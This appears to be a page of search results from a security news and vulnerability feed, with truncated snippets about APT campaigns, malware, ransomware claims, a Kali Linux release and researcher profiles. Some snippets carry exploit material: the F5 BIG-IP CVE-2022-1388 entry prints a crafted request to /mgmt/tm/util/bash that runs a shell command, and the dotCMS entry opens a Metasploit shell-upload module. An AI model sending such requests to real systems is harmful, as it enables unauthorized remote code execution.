3416 matches found
User can bypass entryFee by sending arbitrary calldata to ParaSwap operator
Lines of code Vulnerability details Impact Any user is able to bypass the entryFee collection when using NestedFactory.create by passing in arbitrary calldata when using the ParaSwap router. High level, a user can pass in calldata to swap from a minuscule amount of input token to an ERC777 with...
Police Linked to Hacking Campaign to Frame Indian Activists
New details connect police in India to a plot to plant evidence on victims' computers that led to their arrest...
Trellix Threat Labs Uncovers Critical Flaws in Widely Used Building Access Control System
Trellix Threat Labs Uncovers Critical Flaws in Widely Used Building Access Control System By Trellix · June 9, 2022 This story was also written by Steve Povolny and Sam Quinn. Today at the Hardwear.io Security Trainings and Conference, Trellix Threat Labs is sharing new research into...
Cyber Security Giant Mandiant Denies Hacking Claims By LockBit Ransomware
By Deeba Ahmed According to a Mandiant representative, the company was aware of LockBit 2.0 claims, but there was no evidence of…
dotCMS Shell Upload
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'DotCMS RCE via Arbitrary File Upload.', 'Description' = %q When files are uploaded into dotCMS via the content API, but before they become conten...
Researchers Find New Malware Attacks Targeting Russian Government Entities
An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022. "The campaigns ... are designed to implant a Remote Access Trojan (RAT) that can be used to...
The Justice Department Will No Longer Charge Security Researchers with Criminal Hacking
Following a recent Supreme Court ruling, the Justice Department will no longer prosecute "good faith" security researchers with cybercrimes: The policy for the first time directs that good-faith security research should not be charged. Good faith security research means accessing a computer solel...
A week in security (May 16 – 22)
Last week on Malwarebytes Labs: Fake reCAPTCHA forms dupe users via compromised WordPress sites; How COVID-19 fuelled a surge in malware; Why MRG-Effitas matters to SMBs; “Look what I found here” phish targets Facebook users; AirTag stalking: What is it, and how can I avoid it?; Long lost @ symbol get...
Researcher Spotlight: Hector Peralta’s Evolution from Popcorn Server to the MSRC Leaderboards
“The bug bounty literally changed my life. Before this, I had nothing.” Coolest thing he purchased: His first vehicle! Best gift to give: Buying his nephew gaming accessories. Favorite Hacking Companion: His two cats. They’re always by his side when he is working late. Origin of his Hacker name...
Kali Linux 2022.2 - Penetration Testing and Ethical Hacking Linux Distribution
Time for another Kali Linux release! – Kali Linux 2022.2. This release has various impressive updates. The summary of the changelog since the 2022.1 release from February 2022 is: GNOME 42 - Major release update of the popular desktop environment; KDE Plasma 5.24 - Version bump with a more...
Get to Know Steve Povolny
Meet Steve Povolny Head of Advanced Threat Research for Trellix Threat Labs By Michael Alicea · May 17, 2022 At Trellix, we celebrate and champion our people. This week, I sat down with Steve Povolny, Head of Advanced Threat Research for Trellix Threat Labs. As he is one of the leading...
CVE-2022-26923
creationtimestamp | type | source
---|---|---
2022-05-11 04:00:00+00:00 | seen | https://www.govcert.gov.hk/en/alertsdetail.php?id=801
2022-05-12 02:37:16+00:00 | published-proof-of-concept | https://t.me/GithubRedTeam/2166
2022-05-12 11:01:01+00:00 | seen | https://t.me/CyberSecurityTechnologies/5987...
Experts Sound Alarm on DCRat Backdoor Being Sold on Russian Hacking Forums
Cybersecurity researchers have shed light on an actively maintained remote access trojan called DCRat (aka DarkCrystal RAT) that's offered on sale for "dirt cheap" prices, making it accessible to professional cybercriminal groups and novice actors alike. "Unlike the well-funded, massive Russian...
A week in security (May 2 – 8)
Last week on Malwarebytes Labs: Google, Apple, and Microsoft step hand in hand into a passwordless future; OpenSea warns of Discord channel compromise; Avoid these Instagram “Get rich with Bitcoin” scams; Steer clear of fake premium mobile app unlockers; How Instagram scammers talk users out of their...
F5 BIG-IP Remote Code Execution
F5 BIG-IP RCE exploitation CVE-2022-1388 POST 1: POST /mgmt/tm/util/bash HTTP/1.1 Host: :8443 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 "command": "run" , "utilCmdArgs": " -c 'id' " curl commandliner: $ curl -i -s -k -X $'POST' -H $'Host: :8443' -H...
Exploit for Code Injection in Exiftool_Project Exiftool
Welcome to my Ethical Hacking Journey...
A week in security (April 25 – May 1)
Last week on Malwarebytes Labs: Why MITRE matters to SMBs; Apple’s child safety features are coming to a Messages app near you; Why software has so many vulnerabilities, with Tanya Janca: Lock and Code S03E09; Watch out for this SMS phish promising a tax refund; Rogue ads phishing for cryptocurrency:...
Experts Detail 3 Hacking Teams Working Under the Umbrella of TA410 Group
A cyberespionage threat actor known for targeting a variety of critical infrastructure sectors in Africa, the Middle East, and the U.S. has been observed using an upgraded version of a remote access trojan with information stealing capabilities. Calling TA410 an umbrella group comprised of three...
QNAP Advises to Mitigate Remote Hacking Flaws Until Patches are Available
Network-attached storage (NAS) appliance maker QNAP on Wednesday said it's working on updating its QTS and QuTS operating systems after Netatalk last month released patches to contain seven security flaws in its software. Netatalk is an open-source implementation of the Apple Filing Protocol (AFP),...